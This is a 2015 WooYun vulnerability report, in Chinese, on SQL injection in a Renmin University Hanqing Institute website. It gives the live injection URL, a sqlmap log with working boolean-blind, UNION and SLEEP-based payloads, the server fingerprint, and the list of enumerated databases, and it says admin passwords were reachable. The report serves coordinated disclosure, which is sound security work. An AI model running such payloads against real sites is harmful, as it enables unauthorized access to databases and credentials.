当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142174

漏洞标题:中国人民大学某站SQL注入一枚!

相关厂商:中国人民大学

漏洞作者: 心云

提交时间:2015-09-22 23:57

修复时间:2015-11-11 12:02

公开时间:2015-11-11 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经确认,细节仅向厂商公开
2015-10-07: 细节向核心白帽子及相关领域专家公开
2015-10-17: 细节向普通白帽子公开
2015-10-27: 细节向实习白帽子公开
2015-11-11: 细节向公众公开

简要描述:

中国人民大学汉青经济与金融高级研究院(以下简称汉青研究院)是企业家赵汉青先生在中国人民大学捐资建立的一个新型国际化学院,于2007年3月正式揭牌成立,中国人民大学原校长纪宝成教授和诺贝尔经济学奖获得者斯蒂格利茨教授任名誉院长。梁晶教授任执行院长,主持工作。研究院同时成立了由中国人民大学原校长黄达教授、普林斯顿大学邹至庄教授、全国人大财经委副主任吴晓灵教授、普林斯顿大学熊伟教授、斯坦福大学洪瀚教授任主任的学术委员会。

详细说明:

可获得多个站点管理员密码
注入点:
http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34

漏洞证明:

[00:20:23] [INFO] testing connection to the target url
[00:20:24] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:20:24] [INFO] testing if the url is stable, wait a few seconds
[00:20:26] [INFO] url is stable
[00:20:26] [INFO] testing if GET parameter 'class' is dynamic
[00:20:27] [INFO] confirming that GET parameter 'class' is dynamic
[00:20:28] [INFO] GET parameter 'class' is dynamic
[00:20:29] [WARNING] reflective value(s) found and filtering out
[00:20:29] [WARNING] heuristic test shows that GET parameter 'class' might not b
e injectable
[00:20:29] [INFO] testing for SQL injection on GET parameter 'class'
[00:20:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:20:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:20:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:21:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:21:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:51] [INFO] testing 'Oracle AND time-based blind'
[00:22:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:23:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:23:13] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[00:24:31] [WARNING] GET parameter 'class' is not injectable
[00:24:31] [INFO] testing if GET parameter 'iClassID' is dynamic
[00:24:32] [INFO] confirming that GET parameter 'iClassID' is dynamic
[00:24:33] [INFO] GET parameter 'iClassID' is dynamic
[00:24:34] [WARNING] heuristic test shows that GET parameter 'iClassID' might no
t be injectable
[00:24:34] [INFO] testing for SQL injection on GET parameter 'iClassID'
[00:24:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:24:38] [INFO] GET parameter 'iClassID' is 'AND boolean-based blind - WHERE o
r HAVING clause' injectable
[00:24:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:24:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:24:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:24:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:24:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:24:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:24:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:44] [INFO] GET parameter 'iClassID' is 'MySQL > 5.0.11 AND time-based bli
nd' injectable
[00:25:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:25:44] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[00:25:46] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[00:25:52] [INFO] target url appears to have 38 columns in query
[00:26:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[00:26:29] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[00:27:12] [INFO] GET parameter 'iClassID' is 'MySQL UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'iClassID' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 233 HTTP(s) req
uests:
---
Place: GET
Parameter: iClassID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=gjjl&iClassID=34 AND 7256=7256
Type: UNION query
Title: MySQL UNION query (NULL) - 38 columns
Payload: class=gjjl&iClassID=34 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCA
T(0x3a6672613a,0x446f6d597153646b6a53,0x3a6973743a), NULL, NULL, NULL, NULL, NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: class=gjjl&iClassID=34 AND SLEEP(5)
---
[00:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.11
[00:46:17] [INFO] fetching database names
available databases [17]:
[*] demo_hanqing
[*] demo_hq2014
[*] demo_hq2015
[*] demo_hq_bak
[*] demo_hqen
[*] demo_psycamp2014
[*] demo_psyweb
[*] hanqing_research
[*] hanqing_sign
[*] huazi
[*] hxzcw
[*] information_schema
[*] lieren
[*] mysql
[*] ocity
[*] performance_schema
[*] weixin_yingtao


demo_hangqing.png


demo_hangqing_tables.png


demo_hangqing_admin.png


demo_hangqing_admin2.png


demo_hangqing_admin3.png


修复方案:

严格过滤

版权声明:转载请注明来源 心云@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-27 12:02

厂商回复:

尽快通知相关人员进行处理

最新状态:

暂无